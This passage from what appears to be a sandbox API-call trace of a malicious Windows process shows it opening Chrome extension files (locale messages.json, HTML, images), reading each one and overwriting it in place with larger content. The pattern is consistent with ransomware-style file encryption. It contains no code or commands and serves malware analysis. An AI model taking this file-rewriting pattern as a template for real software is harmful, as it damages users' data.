nNumberOfBytesToRead=0xaf, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x331f2bc*=0xaf, lpOverlapped=0x0) returned 1 [0162.408] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.408] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x637, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x637, lpOverlapped=0x0) returned 1 [0162.408] CloseHandle (hObject=0x1dc) returned 1 [0162.409] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.410] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.410] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x150 [0162.410] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.410] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.410] ReleaseMutex (hMutex=0x168) returned 1 [0162.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.411] ReadFile (in: hFile=0x1dc, lpBuffer=0x288ab48, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ab48*, lpNumberOfBytesRead=0x331f2bc*=0x150, lpOverlapped=0x0) returned 1 [0162.412] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.412] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6d8, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x331f2d0*=0x6d8, lpOverlapped=0x0) returned 1 [0162.412] CloseHandle (hObject=0x1dc) returned 1 [0162.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.413] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.414] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xd2 [0162.414] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.414] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.414] ReleaseMutex (hMutex=0x168) returned 1 [0162.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.414] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ed1758, nNumberOfBytesToRead=0xd2, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1758*, lpNumberOfBytesRead=0x331f2bc*=0xd2, lpOverlapped=0x0) returned 1 [0162.416] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.416] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65a, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x65a, lpOverlapped=0x0) returned 1 [0162.416] CloseHandle (hObject=0x1dc) returned 1 [0162.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.417] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.418] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x32a [0162.418] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.418] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.418] ReleaseMutex (hMutex=0x168) returned 1 [0162.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="craw_window.html", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0162.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="craw_window.html", cchWideChar=16, lpMultiByteStr=0x1f88d34, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="craw_window.html", lpUsedDefaultChar=0x0) returned 16 [0162.419] ReadFile (in: hFile=0x1dc, lpBuffer=0x25abb98, nNumberOfBytesToRead=0x32a, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25abb98*, lpNumberOfBytesRead=0x331f2bc*=0x32a, lpOverlapped=0x0) returned 1 [0162.427] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.428] WriteFile (in: hFile=0x1dc, lpBuffer=0x2848988*, nNumberOfBytesToWrite=0x8b2, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848988*, lpNumberOfBytesWritten=0x331f2d0*=0x8b2, lpOverlapped=0x0) returned 1 [0162.428] CloseHandle (hObject=0x1dc) returned 1 [0162.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.429] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.429] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa0 [0162.430] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.430] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.430] ReleaseMutex (hMutex=0x168) returned 1 [0162.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="topbar_floating_button_pressed.png", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0162.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="topbar_floating_button_pressed.png", cchWideChar=34, lpMultiByteStr=0x1fa55f4, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="topbar_floating_button_pressed.png", lpUsedDefaultChar=0x0) returned 34 [0162.430] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b9108, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b9108*, lpNumberOfBytesRead=0x331f2bc*=0xa0, lpOverlapped=0x0) returned 1 [0162.431] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.432] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x628, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x628, lpOverlapped=0x0) returned 1 [0162.432] CloseHandle (hObject=0x1dc) returned 1 [0162.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.433] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.433] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x269 [0162.434] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.434] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.434] ReleaseMutex (hMutex=0x168) returned 1 [0162.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.434] ReadFile (in: hFile=0x1dc, lpBuffer=0x286daa8, nNumberOfBytesToRead=0x269, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesRead=0x331f2bc*=0x269, lpOverlapped=0x0) returned 1 [0163.074] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0163.074] WriteFile (in: hFile=0x1dc, lpBuffer=0x2848988*, nNumberOfBytesToWrite=0x7f1, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848988*, lpNumberOfBytesWritten=0x331f2d0*=0x7f1, lpOverlapped=0x0) returned 1 [0164.838] CloseHandle (hObject=0x1dc) returned 1 [0164.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0164.839] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.839] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3ad [0164.840] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.840] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.840] ReleaseMutex (hMutex=0x168) returned 1 [0164.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.840] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x3ad, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x331f2bc*=0x3ad, lpOverlapped=0x0) returned 1 [0164.842] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0164.842] WriteFile (in: hFile=0x1dc, lpBuffer=0x3d0e048*, nNumberOfBytesToWrite=0x935, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d0e048*, lpNumberOfBytesWritten=0x331f2d0*=0x935, lpOverlapped=0x0) returned 1 [0164.842] CloseHandle (hObject=0x1dc) returned 1 [0164.842] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0164.844] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.844] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2bb [0164.844] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.844] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.845] ReleaseMutex (hMutex=0x168) returned 1 [0164.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.845] ReadFile (in: hFile=0x1dc, lpBuffer=0x2871b08, nNumberOfBytesToRead=0x2bb, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2871b08*, lpNumberOfBytesRead=0x331f2bc*=0x2bb, lpOverlapped=0x0) returned 1 [0164.846] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0164.847] WriteFile (in: hFile=0x1dc, lpBuffer=0x3d0e048*, nNumberOfBytesToWrite=0x843, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d0e048*, lpNumberOfBytesWritten=0x331f2d0*=0x843, lpOverlapped=0x0) returned 1 [0164.847] CloseHandle (hObject=0x1dc) returned 1 [0164.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0164.848] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.848] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x29f [0164.848] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.848] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.848] ReleaseMutex (hMutex=0x168) returned 1 [0164.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.848] ReadFile (in: hFile=0x1dc, lpBuffer=0x2871b08, nNumberOfBytesToRead=0x29f, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2871b08*, lpNumberOfBytesRead=0x331f2bc*=0x29f, lpOverlapped=0x0) returned 1 [0164.850] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0164.850] WriteFile (in: hFile=0x1dc, lpBuffer=0x3d0e048*, nNumberOfBytesToWrite=0x827, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d0e048*, lpNumberOfBytesWritten=0x331f2d0*=0x827, lpOverlapped=0x0) returned 1 [0164.850] CloseHandle (hObject=0x1dc) returned 1 [0164.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0164.852] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.852] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x253 [0164.852] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.852] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.852] ReleaseMutex (hMutex=0x168) returned 1 [0164.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.852] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x253, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x331f2bc*=0x253, lpOverlapped=0x0) returned 1 [0164.854] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0164.854] WriteFile (in: hFile=0x1dc, lpBuffer=0x3d0e048*, nNumberOfBytesToWrite=0x7db, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d0e048*, lpNumberOfBytesWritten=0x331f2d0*=0x7db, lpOverlapped=0x0) returned 1 [0164.855] CloseHandle (hObject=0x1dc) returned 1 [0164.855] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0164.856] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.856] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xf9 [0164.856] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.856] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.856] ReleaseMutex (hMutex=0x168) returned 1 [0164.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.856] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eeb308, 